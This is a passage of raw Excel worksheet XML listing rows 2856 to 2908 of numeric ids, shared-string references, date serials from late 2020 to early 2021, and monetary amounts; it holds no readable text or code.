      <c r="F2856" t="s">
        <v>9523</v>
      </c>
      <c r="G2856" s="1">
        <v>44127</v>
      </c>
      <c r="H2856">
        <v>1500</v>
      </c>
      <c r="J2856" t="s">
        <v>12209</v>
      </c>
    </row>
    <row r="2857" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2857">
        <v>22717</v>
      </c>
      <c r="B2857">
        <v>631</v>
      </c>
      <c r="C2857" t="s">
        <v>16457</v>
      </c>
      <c r="D2857" t="s">
        <v>16458</v>
      </c>
      <c r="E2857">
        <v>14</v>
      </c>
      <c r="F2857" t="s">
        <v>12210</v>
      </c>
      <c r="G2857" s="1">
        <v>44130</v>
      </c>
      <c r="H2857" s="4">
        <v>37950</v>
      </c>
      <c r="J2857" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2858" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2858">
        <v>22718</v>
      </c>
      <c r="B2858">
        <v>631</v>
      </c>
      <c r="C2858" t="s">
        <v>16457</v>
      </c>
      <c r="D2858" t="s">
        <v>16458</v>
      </c>
      <c r="E2858">
        <v>14</v>
      </c>
      <c r="F2858" t="s">
        <v>1455</v>
      </c>
      <c r="G2858" s="1">
        <v>44130</v>
      </c>
      <c r="H2858" s="4">
        <v>2145</v>
      </c>
      <c r="J2858" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2859" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2859">
        <v>22721</v>
      </c>
      <c r="B2859">
        <v>4902</v>
      </c>
      <c r="C2859" t="s">
        <v>7533</v>
      </c>
      <c r="D2859" t="s">
        <v>16459</v>
      </c>
      <c r="E2859">
        <v>21</v>
      </c>
      <c r="F2859" t="s">
        <v>12212</v>
      </c>
      <c r="G2859" s="1">
        <v>44148</v>
      </c>
      <c r="H2859" s="3" t="s">
        <v>16258</v>
      </c>
      <c r="I2859" t="s">
        <v>12213</v>
      </c>
    </row>
    <row r="2860" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2860">
        <v>22722</v>
      </c>
      <c r="B2860">
        <v>4902</v>
      </c>
      <c r="C2860" t="s">
        <v>7533</v>
      </c>
      <c r="D2860" t="s">
        <v>12211</v>
      </c>
      <c r="E2860">
        <v>21</v>
      </c>
      <c r="F2860" t="s">
        <v>12214</v>
      </c>
      <c r="G2860" s="1">
        <v>44148</v>
      </c>
      <c r="H2860">
        <v>240</v>
      </c>
      <c r="I2860" t="s">
        <v>12215</v>
      </c>
    </row>
    <row r="2861" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2861">
        <v>22724</v>
      </c>
      <c r="B2861">
        <v>4902</v>
      </c>
      <c r="C2861" t="s">
        <v>7533</v>
      </c>
      <c r="D2861" t="s">
        <v>12211</v>
      </c>
      <c r="E2861">
        <v>21</v>
      </c>
      <c r="F2861" t="s">
        <v>1276</v>
      </c>
      <c r="G2861" s="1">
        <v>44148</v>
      </c>
      <c r="H2861">
        <v>288</v>
      </c>
      <c r="I2861" t="s">
        <v>12216</v>
      </c>
    </row>
    <row r="2862" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2862">
        <v>22728</v>
      </c>
      <c r="B2862">
        <v>1756</v>
      </c>
      <c r="C2862" t="s">
        <v>6228</v>
      </c>
      <c r="D2862" t="s">
        <v>11817</v>
      </c>
      <c r="E2862">
        <v>28</v>
      </c>
      <c r="F2862" t="s">
        <v>6917</v>
      </c>
      <c r="G2862" s="1">
        <v>44141</v>
      </c>
      <c r="H2862">
        <v>5000</v>
      </c>
      <c r="I2862" t="s">
        <v>9746</v>
      </c>
    </row>
    <row r="2863" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2863">
        <v>22730</v>
      </c>
      <c r="B2863">
        <v>4862</v>
      </c>
      <c r="C2863" t="s">
        <v>7400</v>
      </c>
      <c r="D2863" t="s">
        <v>12103</v>
      </c>
      <c r="E2863">
        <v>2</v>
      </c>
      <c r="F2863" t="s">
        <v>12217</v>
      </c>
      <c r="G2863" s="1">
        <v>44145</v>
      </c>
      <c r="H2863">
        <v>450000</v>
      </c>
      <c r="J2863" t="s">
        <v>11461</v>
      </c>
    </row>
    <row r="2864" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2864">
        <v>22738</v>
      </c>
      <c r="B2864">
        <v>48</v>
      </c>
      <c r="C2864" t="s">
        <v>16460</v>
      </c>
      <c r="D2864" t="s">
        <v>16461</v>
      </c>
      <c r="E2864">
        <v>12</v>
      </c>
      <c r="F2864" t="s">
        <v>12218</v>
      </c>
      <c r="G2864" s="1">
        <v>44187</v>
      </c>
      <c r="H2864" s="4">
        <v>1000</v>
      </c>
      <c r="I2864" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2865" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2865">
        <v>22739</v>
      </c>
      <c r="B2865">
        <v>48</v>
      </c>
      <c r="C2865" t="s">
        <v>16460</v>
      </c>
      <c r="D2865" t="s">
        <v>16461</v>
      </c>
      <c r="E2865">
        <v>12</v>
      </c>
      <c r="F2865" t="s">
        <v>2236</v>
      </c>
      <c r="G2865" s="1">
        <v>44187</v>
      </c>
      <c r="H2865" s="4">
        <v>6000000</v>
      </c>
      <c r="I2865" t="s">
        <v>12219</v>
      </c>
      <c r="J2865" t="s">
        <v>9518</v>
      </c>
    </row>
    <row r="2866" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2866">
        <v>22740</v>
      </c>
      <c r="B2866">
        <v>48</v>
      </c>
      <c r="C2866" t="s">
        <v>16460</v>
      </c>
      <c r="D2866" t="s">
        <v>16461</v>
      </c>
      <c r="E2866">
        <v>12</v>
      </c>
      <c r="F2866" t="s">
        <v>12220</v>
      </c>
      <c r="G2866" s="1">
        <v>44187</v>
      </c>
      <c r="H2866" s="4">
        <v>7000000</v>
      </c>
      <c r="I2866" t="s">
        <v>12221</v>
      </c>
      <c r="J2866" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2867" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2867">
        <v>22741</v>
      </c>
      <c r="B2867">
        <v>48</v>
      </c>
      <c r="C2867" t="s">
        <v>16460</v>
      </c>
      <c r="D2867" t="s">
        <v>16461</v>
      </c>
      <c r="E2867">
        <v>12</v>
      </c>
      <c r="F2867" t="s">
        <v>9561</v>
      </c>
      <c r="G2867" s="1">
        <v>44187</v>
      </c>
      <c r="H2867" s="4">
        <v>150000</v>
      </c>
      <c r="I2867" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2868" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2868">
        <v>22746</v>
      </c>
      <c r="B2868">
        <v>439</v>
      </c>
      <c r="C2868" t="s">
        <v>1445</v>
      </c>
      <c r="D2868" t="s">
        <v>12222</v>
      </c>
      <c r="E2868">
        <v>17</v>
      </c>
      <c r="F2868" t="s">
        <v>2236</v>
      </c>
      <c r="G2868" s="1">
        <v>44137</v>
      </c>
      <c r="H2868">
        <v>408000</v>
      </c>
      <c r="I2868" t="s">
        <v>9746</v>
      </c>
      <c r="J2868" t="s">
        <v>12223</v>
      </c>
    </row>
    <row r="2869" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2869">
        <v>22747</v>
      </c>
      <c r="B2869">
        <v>439</v>
      </c>
      <c r="C2869" t="s">
        <v>1445</v>
      </c>
      <c r="D2869" t="s">
        <v>12222</v>
      </c>
      <c r="E2869">
        <v>17</v>
      </c>
      <c r="F2869" t="s">
        <v>12224</v>
      </c>
      <c r="G2869" s="1">
        <v>44137</v>
      </c>
      <c r="H2869">
        <v>50000</v>
      </c>
      <c r="I2869" t="s">
        <v>9746</v>
      </c>
      <c r="J2869" t="s">
        <v>12223</v>
      </c>
    </row>
    <row r="2870" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2870">
        <v>22748</v>
      </c>
      <c r="B2870">
        <v>439</v>
      </c>
      <c r="C2870" t="s">
        <v>1445</v>
      </c>
      <c r="D2870" t="s">
        <v>12222</v>
      </c>
      <c r="E2870">
        <v>17</v>
      </c>
      <c r="F2870" t="s">
        <v>9610</v>
      </c>
      <c r="G2870" s="1">
        <v>44137</v>
      </c>
      <c r="H2870">
        <v>1000</v>
      </c>
      <c r="J2870" t="s">
        <v>12223</v>
      </c>
    </row>
    <row r="2871" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2871">
        <v>22749</v>
      </c>
      <c r="B2871">
        <v>439</v>
      </c>
      <c r="C2871" t="s">
        <v>1445</v>
      </c>
      <c r="D2871" t="s">
        <v>12222</v>
      </c>
      <c r="E2871">
        <v>17</v>
      </c>
      <c r="F2871" t="s">
        <v>12225</v>
      </c>
      <c r="G2871" s="1">
        <v>44137</v>
      </c>
      <c r="H2871">
        <v>24000</v>
      </c>
      <c r="I2871" t="s">
        <v>9746</v>
      </c>
      <c r="J2871" t="s">
        <v>12223</v>
      </c>
    </row>
    <row r="2872" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2872">
        <v>22751</v>
      </c>
      <c r="B2872">
        <v>439</v>
      </c>
      <c r="C2872" t="s">
        <v>1445</v>
      </c>
      <c r="D2872" t="s">
        <v>12222</v>
      </c>
      <c r="E2872">
        <v>17</v>
      </c>
      <c r="F2872" t="s">
        <v>12226</v>
      </c>
      <c r="G2872" s="1">
        <v>44137</v>
      </c>
      <c r="H2872">
        <v>100</v>
      </c>
      <c r="J2872" t="s">
        <v>12223</v>
      </c>
    </row>
    <row r="2873" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2873">
        <v>22756</v>
      </c>
      <c r="B2873">
        <v>2155</v>
      </c>
      <c r="C2873" t="s">
        <v>5100</v>
      </c>
      <c r="D2873" t="s">
        <v>10025</v>
      </c>
      <c r="E2873">
        <v>26</v>
      </c>
      <c r="F2873" t="s">
        <v>9437</v>
      </c>
      <c r="G2873" s="1">
        <v>44253</v>
      </c>
      <c r="H2873">
        <v>30</v>
      </c>
      <c r="J2873" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="2874" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2874">
        <v>22757</v>
      </c>
      <c r="B2874">
        <v>439</v>
      </c>
      <c r="C2874" t="s">
        <v>1445</v>
      </c>
      <c r="D2874" t="s">
        <v>12222</v>
      </c>
      <c r="E2874">
        <v>17</v>
      </c>
      <c r="F2874" t="s">
        <v>4686</v>
      </c>
      <c r="G2874" s="1">
        <v>44137</v>
      </c>
      <c r="H2874">
        <v>100</v>
      </c>
      <c r="I2874" t="s">
        <v>9746</v>
      </c>
      <c r="J2874" t="s">
        <v>12223</v>
      </c>
    </row>
    <row r="2875" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2875">
        <v>22758</v>
      </c>
      <c r="B2875">
        <v>2155</v>
      </c>
      <c r="C2875" t="s">
        <v>5100</v>
      </c>
      <c r="D2875" t="s">
        <v>10025</v>
      </c>
      <c r="E2875">
        <v>26</v>
      </c>
      <c r="F2875" t="s">
        <v>9681</v>
      </c>
      <c r="G2875" s="1">
        <v>44246</v>
      </c>
      <c r="H2875">
        <v>30</v>
      </c>
      <c r="J2875" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="2876" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2876">
        <v>22759</v>
      </c>
      <c r="B2876">
        <v>2155</v>
      </c>
      <c r="C2876" t="s">
        <v>5100</v>
      </c>
      <c r="D2876" t="s">
        <v>10025</v>
      </c>
      <c r="E2876">
        <v>26</v>
      </c>
      <c r="F2876" t="s">
        <v>12227</v>
      </c>
      <c r="G2876" s="1">
        <v>44253</v>
      </c>
      <c r="H2876">
        <v>30000</v>
      </c>
      <c r="J2876" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="2877" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2877">
        <v>22760</v>
      </c>
      <c r="B2877">
        <v>2155</v>
      </c>
      <c r="C2877" t="s">
        <v>5100</v>
      </c>
      <c r="D2877" t="s">
        <v>10025</v>
      </c>
      <c r="E2877">
        <v>26</v>
      </c>
      <c r="F2877" t="s">
        <v>9527</v>
      </c>
      <c r="G2877" s="1">
        <v>44253</v>
      </c>
      <c r="H2877">
        <v>1000</v>
      </c>
      <c r="J2877" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="2878" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2878">
        <v>22762</v>
      </c>
      <c r="B2878">
        <v>2155</v>
      </c>
      <c r="C2878" t="s">
        <v>5100</v>
      </c>
      <c r="D2878" t="s">
        <v>10025</v>
      </c>
      <c r="E2878">
        <v>26</v>
      </c>
      <c r="F2878" t="s">
        <v>12228</v>
      </c>
      <c r="G2878" s="1">
        <v>44246</v>
      </c>
      <c r="H2878">
        <v>1000</v>
      </c>
      <c r="J2878" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="2879" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2879">
        <v>22763</v>
      </c>
      <c r="B2879">
        <v>2155</v>
      </c>
      <c r="C2879" t="s">
        <v>5100</v>
      </c>
      <c r="D2879" t="s">
        <v>10025</v>
      </c>
      <c r="E2879">
        <v>26</v>
      </c>
      <c r="F2879" t="s">
        <v>12229</v>
      </c>
      <c r="G2879" s="1">
        <v>44253</v>
      </c>
      <c r="H2879">
        <v>1000</v>
      </c>
      <c r="J2879" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="2880" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2880">
        <v>22764</v>
      </c>
      <c r="B2880">
        <v>2724</v>
      </c>
      <c r="C2880" t="s">
        <v>6873</v>
      </c>
      <c r="D2880" t="s">
        <v>12230</v>
      </c>
      <c r="E2880">
        <v>13</v>
      </c>
      <c r="F2880" t="s">
        <v>12231</v>
      </c>
      <c r="G2880" s="1">
        <v>44160</v>
      </c>
      <c r="H2880">
        <v>1000000</v>
      </c>
      <c r="I2880" t="s">
        <v>12232</v>
      </c>
      <c r="J2880" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="2881" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2881">
        <v>22765</v>
      </c>
      <c r="B2881">
        <v>1124</v>
      </c>
      <c r="C2881" t="s">
        <v>16462</v>
      </c>
      <c r="D2881" t="s">
        <v>16463</v>
      </c>
      <c r="E2881">
        <v>16</v>
      </c>
      <c r="F2881" t="s">
        <v>10769</v>
      </c>
      <c r="G2881" s="1">
        <v>44176</v>
      </c>
      <c r="H2881" s="4">
        <v>600000</v>
      </c>
      <c r="J2881" t="s">
        <v>12233</v>
      </c>
    </row>
    <row r="2882" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2882">
        <v>22766</v>
      </c>
      <c r="B2882">
        <v>1124</v>
      </c>
      <c r="C2882" t="s">
        <v>16462</v>
      </c>
      <c r="D2882" t="s">
        <v>16463</v>
      </c>
      <c r="E2882">
        <v>16</v>
      </c>
      <c r="F2882" t="s">
        <v>12234</v>
      </c>
      <c r="G2882" s="1">
        <v>44176</v>
      </c>
      <c r="H2882" s="4">
        <v>600000</v>
      </c>
      <c r="J2882" t="s">
        <v>12233</v>
      </c>
    </row>
    <row r="2883" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2883">
        <v>22767</v>
      </c>
      <c r="B2883">
        <v>1124</v>
      </c>
      <c r="C2883" t="s">
        <v>16462</v>
      </c>
      <c r="D2883" t="s">
        <v>16463</v>
      </c>
      <c r="E2883">
        <v>16</v>
      </c>
      <c r="F2883" t="s">
        <v>9437</v>
      </c>
      <c r="G2883" s="1">
        <v>44176</v>
      </c>
      <c r="H2883" s="4">
        <v>600000</v>
      </c>
      <c r="J2883" t="s">
        <v>12233</v>
      </c>
    </row>
    <row r="2884" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2884">
        <v>22768</v>
      </c>
      <c r="B2884">
        <v>1124</v>
      </c>
      <c r="C2884" t="s">
        <v>16462</v>
      </c>
      <c r="D2884" t="s">
        <v>16463</v>
      </c>
      <c r="E2884">
        <v>16</v>
      </c>
      <c r="F2884" t="s">
        <v>2236</v>
      </c>
      <c r="G2884" s="1">
        <v>44176</v>
      </c>
      <c r="H2884" s="4">
        <v>600000</v>
      </c>
      <c r="J2884" t="s">
        <v>12233</v>
      </c>
    </row>
    <row r="2885" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2885">
        <v>22770</v>
      </c>
      <c r="B2885">
        <v>974</v>
      </c>
      <c r="C2885" t="s">
        <v>3725</v>
      </c>
      <c r="D2885" t="s">
        <v>12235</v>
      </c>
      <c r="E2885">
        <v>17</v>
      </c>
      <c r="F2885" t="s">
        <v>12236</v>
      </c>
      <c r="G2885" s="1">
        <v>44139</v>
      </c>
      <c r="H2885">
        <v>0</v>
      </c>
      <c r="I2885" t="s">
        <v>12132</v>
      </c>
      <c r="J2885" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2886" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2886">
        <v>22771</v>
      </c>
      <c r="B2886">
        <v>974</v>
      </c>
      <c r="C2886" t="s">
        <v>3725</v>
      </c>
      <c r="D2886" t="s">
        <v>12235</v>
      </c>
      <c r="E2886">
        <v>17</v>
      </c>
      <c r="F2886" t="s">
        <v>4686</v>
      </c>
      <c r="G2886" s="1">
        <v>44139</v>
      </c>
      <c r="H2886">
        <v>0</v>
      </c>
      <c r="I2886" t="s">
        <v>12237</v>
      </c>
      <c r="J2886" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2887" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2887">
        <v>22772</v>
      </c>
      <c r="B2887">
        <v>974</v>
      </c>
      <c r="C2887" t="s">
        <v>3725</v>
      </c>
      <c r="D2887" t="s">
        <v>12235</v>
      </c>
      <c r="E2887">
        <v>17</v>
      </c>
      <c r="F2887" t="s">
        <v>12238</v>
      </c>
      <c r="G2887" s="1">
        <v>44139</v>
      </c>
      <c r="H2887">
        <v>0</v>
      </c>
      <c r="I2887" t="s">
        <v>10358</v>
      </c>
      <c r="J2887" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2888" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2888">
        <v>22773</v>
      </c>
      <c r="B2888">
        <v>974</v>
      </c>
      <c r="C2888" t="s">
        <v>3725</v>
      </c>
      <c r="D2888" t="s">
        <v>12235</v>
      </c>
      <c r="E2888">
        <v>17</v>
      </c>
      <c r="F2888" t="s">
        <v>2236</v>
      </c>
      <c r="G2888" s="1">
        <v>44139</v>
      </c>
      <c r="H2888">
        <v>0</v>
      </c>
      <c r="I2888" t="s">
        <v>12237</v>
      </c>
      <c r="J2888" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="2889" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2889">
        <v>22774</v>
      </c>
      <c r="B2889">
        <v>600</v>
      </c>
      <c r="C2889" t="s">
        <v>2032</v>
      </c>
      <c r="D2889" t="s">
        <v>12239</v>
      </c>
      <c r="E2889">
        <v>16</v>
      </c>
      <c r="F2889" t="s">
        <v>9598</v>
      </c>
      <c r="G2889" s="1">
        <v>44167</v>
      </c>
      <c r="H2889">
        <v>50</v>
      </c>
      <c r="J2889" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2890" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2890">
        <v>22775</v>
      </c>
      <c r="B2890">
        <v>600</v>
      </c>
      <c r="C2890" t="s">
        <v>2032</v>
      </c>
      <c r="D2890" t="s">
        <v>12239</v>
      </c>
      <c r="E2890">
        <v>16</v>
      </c>
      <c r="F2890" t="s">
        <v>12240</v>
      </c>
      <c r="G2890" s="1">
        <v>44167</v>
      </c>
      <c r="H2890">
        <v>20000</v>
      </c>
      <c r="J2890" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2891" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2891">
        <v>22776</v>
      </c>
      <c r="B2891">
        <v>600</v>
      </c>
      <c r="C2891" t="s">
        <v>2032</v>
      </c>
      <c r="D2891" t="s">
        <v>12239</v>
      </c>
      <c r="E2891">
        <v>16</v>
      </c>
      <c r="F2891" t="s">
        <v>1016</v>
      </c>
      <c r="G2891" s="1">
        <v>44167</v>
      </c>
      <c r="H2891">
        <v>20000</v>
      </c>
      <c r="I2891" t="s">
        <v>10409</v>
      </c>
    </row>
    <row r="2892" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2892">
        <v>22777</v>
      </c>
      <c r="B2892">
        <v>600</v>
      </c>
      <c r="C2892" t="s">
        <v>2032</v>
      </c>
      <c r="D2892" t="s">
        <v>12239</v>
      </c>
      <c r="E2892">
        <v>16</v>
      </c>
      <c r="F2892" t="s">
        <v>3499</v>
      </c>
      <c r="G2892" s="1">
        <v>44167</v>
      </c>
      <c r="H2892">
        <v>20000</v>
      </c>
      <c r="J2892" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="2893" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2893">
        <v>22778</v>
      </c>
      <c r="B2893">
        <v>1246</v>
      </c>
      <c r="C2893" t="s">
        <v>3716</v>
      </c>
      <c r="D2893" t="s">
        <v>12241</v>
      </c>
      <c r="E2893">
        <v>8</v>
      </c>
      <c r="F2893" t="s">
        <v>12242</v>
      </c>
      <c r="G2893" s="1">
        <v>44116</v>
      </c>
      <c r="H2893">
        <v>6000000</v>
      </c>
      <c r="I2893" t="s">
        <v>12243</v>
      </c>
    </row>
    <row r="2894" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2894">
        <v>22779</v>
      </c>
      <c r="B2894">
        <v>1246</v>
      </c>
      <c r="C2894" t="s">
        <v>3716</v>
      </c>
      <c r="D2894" t="s">
        <v>12241</v>
      </c>
      <c r="E2894">
        <v>8</v>
      </c>
      <c r="F2894" t="s">
        <v>10695</v>
      </c>
      <c r="G2894" s="1">
        <v>44116</v>
      </c>
      <c r="H2894">
        <v>6000000</v>
      </c>
      <c r="I2894" t="s">
        <v>12243</v>
      </c>
    </row>
    <row r="2895" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2895">
        <v>22780</v>
      </c>
      <c r="B2895">
        <v>1246</v>
      </c>
      <c r="C2895" t="s">
        <v>12244</v>
      </c>
      <c r="D2895" t="s">
        <v>12241</v>
      </c>
      <c r="E2895">
        <v>8</v>
      </c>
      <c r="F2895" t="s">
        <v>9470</v>
      </c>
      <c r="G2895" s="1">
        <v>44116</v>
      </c>
      <c r="H2895">
        <v>0</v>
      </c>
      <c r="J2895" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2896" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2896">
        <v>22781</v>
      </c>
      <c r="B2896">
        <v>4962</v>
      </c>
      <c r="C2896" t="s">
        <v>2612</v>
      </c>
      <c r="D2896" t="s">
        <v>11968</v>
      </c>
      <c r="E2896">
        <v>26</v>
      </c>
      <c r="F2896" t="s">
        <v>945</v>
      </c>
      <c r="G2896" s="1">
        <v>44274</v>
      </c>
      <c r="H2896">
        <v>30000</v>
      </c>
    </row>
    <row r="2897" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2897">
        <v>22783</v>
      </c>
      <c r="B2897">
        <v>2016</v>
      </c>
      <c r="C2897" t="s">
        <v>5283</v>
      </c>
      <c r="D2897" t="s">
        <v>9488</v>
      </c>
      <c r="E2897">
        <v>14</v>
      </c>
      <c r="F2897" t="s">
        <v>9681</v>
      </c>
      <c r="G2897" s="1">
        <v>44123</v>
      </c>
      <c r="H2897">
        <v>12000</v>
      </c>
      <c r="I2897" t="s">
        <v>11160</v>
      </c>
      <c r="J2897" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="2898" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2898">
        <v>22785</v>
      </c>
      <c r="B2898">
        <v>4948</v>
      </c>
      <c r="C2898" t="s">
        <v>7724</v>
      </c>
      <c r="D2898" t="s">
        <v>12100</v>
      </c>
      <c r="E2898">
        <v>13</v>
      </c>
      <c r="F2898" t="s">
        <v>8496</v>
      </c>
      <c r="G2898" s="1">
        <v>44207</v>
      </c>
      <c r="H2898">
        <v>18000</v>
      </c>
      <c r="I2898" t="s">
        <v>12245</v>
      </c>
      <c r="J2898" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2899" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2899">
        <v>22786</v>
      </c>
      <c r="B2899">
        <v>4948</v>
      </c>
      <c r="C2899" t="s">
        <v>7724</v>
      </c>
      <c r="D2899" t="s">
        <v>12100</v>
      </c>
      <c r="E2899">
        <v>13</v>
      </c>
      <c r="F2899" t="s">
        <v>1276</v>
      </c>
      <c r="G2899" s="1">
        <v>44207</v>
      </c>
      <c r="H2899">
        <v>18000</v>
      </c>
      <c r="I2899" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2900" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2900">
        <v>22787</v>
      </c>
      <c r="B2900">
        <v>929</v>
      </c>
      <c r="C2900" t="s">
        <v>16464</v>
      </c>
      <c r="D2900" t="s">
        <v>16465</v>
      </c>
      <c r="E2900">
        <v>16</v>
      </c>
      <c r="F2900" t="s">
        <v>9642</v>
      </c>
      <c r="G2900" s="1">
        <v>44166</v>
      </c>
      <c r="H2900" s="4">
        <v>3000000</v>
      </c>
      <c r="J2900" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2901" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2901">
        <v>22788</v>
      </c>
      <c r="B2901">
        <v>1127</v>
      </c>
      <c r="C2901" t="s">
        <v>3548</v>
      </c>
      <c r="D2901" t="s">
        <v>12246</v>
      </c>
      <c r="E2901">
        <v>12</v>
      </c>
      <c r="F2901" t="s">
        <v>2236</v>
      </c>
      <c r="G2901" s="1">
        <v>44235</v>
      </c>
      <c r="H2901">
        <v>528000</v>
      </c>
      <c r="J2901" t="s">
        <v>12247</v>
      </c>
    </row>
    <row r="2902" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2902">
        <v>22789</v>
      </c>
      <c r="B2902">
        <v>1127</v>
      </c>
      <c r="C2902" t="s">
        <v>3548</v>
      </c>
      <c r="D2902" t="s">
        <v>12246</v>
      </c>
      <c r="E2902">
        <v>12</v>
      </c>
      <c r="F2902" t="s">
        <v>4686</v>
      </c>
      <c r="G2902" s="1">
        <v>44235</v>
      </c>
      <c r="H2902">
        <v>5000</v>
      </c>
      <c r="J2902" t="s">
        <v>12248</v>
      </c>
    </row>
    <row r="2903" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2903">
        <v>22790</v>
      </c>
      <c r="B2903">
        <v>1127</v>
      </c>
      <c r="C2903" t="s">
        <v>3548</v>
      </c>
      <c r="D2903" t="s">
        <v>12246</v>
      </c>
      <c r="E2903">
        <v>12</v>
      </c>
      <c r="F2903" t="s">
        <v>12249</v>
      </c>
      <c r="G2903" s="1">
        <v>44235</v>
      </c>
      <c r="H2903">
        <v>10000</v>
      </c>
      <c r="J2903" t="s">
        <v>12250</v>
      </c>
    </row>
    <row r="2904" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2904">
        <v>22792</v>
      </c>
      <c r="B2904">
        <v>1127</v>
      </c>
      <c r="C2904" t="s">
        <v>3548</v>
      </c>
      <c r="D2904" t="s">
        <v>12246</v>
      </c>
      <c r="E2904">
        <v>12</v>
      </c>
      <c r="F2904" t="s">
        <v>9437</v>
      </c>
      <c r="G2904" s="1">
        <v>44235</v>
      </c>
      <c r="H2904">
        <v>10000</v>
      </c>
      <c r="J2904" t="s">
        <v>12251</v>
      </c>
    </row>
    <row r="2905" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2905">
        <v>22794</v>
      </c>
      <c r="B2905">
        <v>2857</v>
      </c>
      <c r="C2905" t="s">
        <v>7809</v>
      </c>
      <c r="D2905" t="s">
        <v>12252</v>
      </c>
      <c r="E2905">
        <v>16</v>
      </c>
      <c r="F2905" t="s">
        <v>673</v>
      </c>
      <c r="G2905" s="1">
        <v>44140</v>
      </c>
      <c r="H2905">
        <v>1075248</v>
      </c>
      <c r="J2905" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2906" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2906">
        <v>22795</v>
      </c>
      <c r="B2906">
        <v>2857</v>
      </c>
      <c r="C2906" t="s">
        <v>7809</v>
      </c>
      <c r="D2906" t="s">
        <v>12252</v>
      </c>
      <c r="E2906">
        <v>16</v>
      </c>
      <c r="F2906" t="s">
        <v>9441</v>
      </c>
      <c r="G2906" s="1">
        <v>44140</v>
      </c>
      <c r="H2906">
        <v>946906</v>
      </c>
      <c r="J2906" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2907" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2907">
        <v>22797</v>
      </c>
      <c r="B2907">
        <v>2857</v>
      </c>
      <c r="C2907" t="s">
        <v>7809</v>
      </c>
      <c r="D2907" t="s">
        <v>12252</v>
      </c>
      <c r="E2907">
        <v>16</v>
      </c>
      <c r="F2907" t="s">
        <v>12253</v>
      </c>
      <c r="G2907" s="1">
        <v>44140</v>
      </c>
      <c r="H2907">
        <v>0</v>
      </c>
    </row>
    <row r="2908" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2908">
        <v>22798</v>
      </c>
      <c r="B2908">
        <v>2857</v>
      </c>
      <c r="C2908" t="s">
        <v>7809</v>
      </c>
      <c r="D2908" t="s">
        <v>12252</v>
      </c>
      <c r="E2908">
        <v>16</v>
      </c>
      <c r="F2908" t="s">
        <v>9437</v>
      </c>
      <c r="G2908" s="1">
        <v>44140</v>
      </c>
      <c r="H2908">
        <v>0</v>
      </c>
    </row>
